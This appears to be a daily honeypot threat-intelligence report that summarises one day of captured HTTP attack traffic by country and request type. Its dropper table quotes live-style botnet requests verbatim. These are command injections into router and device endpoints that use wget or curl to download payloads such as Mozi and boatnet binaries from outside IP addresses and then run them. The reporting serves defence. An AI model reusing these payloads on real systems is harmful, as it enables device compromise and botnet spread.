Skip to main content
  1. Daily-Posts/

Report: 2025-06-15

·420 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-15
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 29 new requests that have never been observed before (these were added to the monitored request database.).

A total of 789 requests were recorded during the day, originating from 6 different countries, with a peak of 254 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
KRGermany
USGermany
USIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.83GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
141.98.11.147GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
103.57.186.120GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.57.186.120:56531/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
5.180.82.34GET /mail/?_from=%7B%7B%23exec(‘cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F135.181.31.27%2Fnumpa.sh%3B%20curl%20-O%20http%3A%2F%2F135.181.31.27%2Fnumpa.sh%3B%20chmod%20%2Bx%20%2A%3B%20chmod%20777%20%2A%3B%20sh%20numpa.sh%3B%20.%2Fnumpa.sh%3B%20rm%20-rf%20%2A’)%7D%7D HTTP/1.1
103.48.64.114GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.64.114:44882/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
144.172.116.95POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
851\x00\x0E8\xDDl\x98\xAC\x90\x83\xD6\xBD\x00\x00\x00\x00\x00
951HEAD /mysql-admin/scripts/setup.php HTTP/1.1
1031GET /Odin/http/call1749972461 HTTP/1.1
1041GET /OdinHttpCall1749972461 HTTP/1.1
1051GET /odinhttpcall1749972461 HTTP/1.1
1061\x00\x0E8k\x05\x1E\x0B\x03;\xD1\x96\x00\x00\x00\x00\x00
1171GET /qEdC HTTP/1.1
1181GET /kZAV HTTP/1.1
1271HEAD /php-myadmin/scripts/setup.php HTTP/1.1
1281HEAD /admin/scripts/setup.php HTTP/1.1
1291HEAD /dbadmin/scripts/setup.php HTTP/1.1
1451GET /Odin/http/call1749973231 HTTP/1.1
1511\x00\x0E8y\xCF\x13\xEE@r\xD5@\x00\x00\x00\x00\x00
1541GET /OdinHttpCall1749973231 HTTP/1.1
1551GET /odinhttpcall1749973231 HTTP/1.1
1561\x00\x0E8\x01\xBB-\x08Q\x9Ah\x1F\x00\x00\x00\x00\x00
1571\x00\x0E\x08\x01\xBB-\x08Q\x9Ah\x1F\x00\x00\x00\x00\x00
1591\x00\x0E\x08\x96\x07\xC8\xDCc\x82\x5C.\x00\x00\x00\x00\x00
1611\x00\x0E8\x96\x07\xC8\xDCc\x82\x5C.\x00\x00\x00\x00\x00
1681GET /axis-cgi/mjpg/video.cgi?camera=&resolution=640x480 HTTP/1.1
1691GET /mjpg/video.mjpg HTTP/1.1
1701GET /coqmjpyqr.jpg HTTP/1.1
1781\x00\x0E8C\x9D\x1A\xE3\x8FUB\xE5\x00\x00\x00\x00\x00
1791\x00\x0E\x08C\x9D\x1A\xE3\x8FUB\xE5\x00\x00\x00\x00\x00
1911GET /o5rF HTTP/1.1
1921GET /NSkQ HTTP/1.1
1991\x00\x0E8m\x96<pF\xE4\xB3\x9F\x00\x00\x00\x00\x00
2021\x00\x0E\x08\xEE\x9Du\xA3R,\x884\x00\x00\x00\x00\x00
2031\x00\x0E8\xEE\x9Du\xA3R,\x884\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0254US
1123DE
266NL
341LT
432JP
529RU
627BG
727PL
823SC
923CN
1022HK
1118IN
1212SG
1310GB
1410ZA
159NG
168GR
178CA
185FR
195TR
204AO
214ES
224MN
233KZ
243GH
252IE
262TW
272KR
282CH
292IL
302VN
311MC
321UA
331FI
341BE
351IT
361RO
371BR

Related

Report: 2025-06-14
·585 words
Repport Daily
Report: 2025-06-13
·2684 words
Repport Daily
Report: 2025-06-12
·339 words
Repport Daily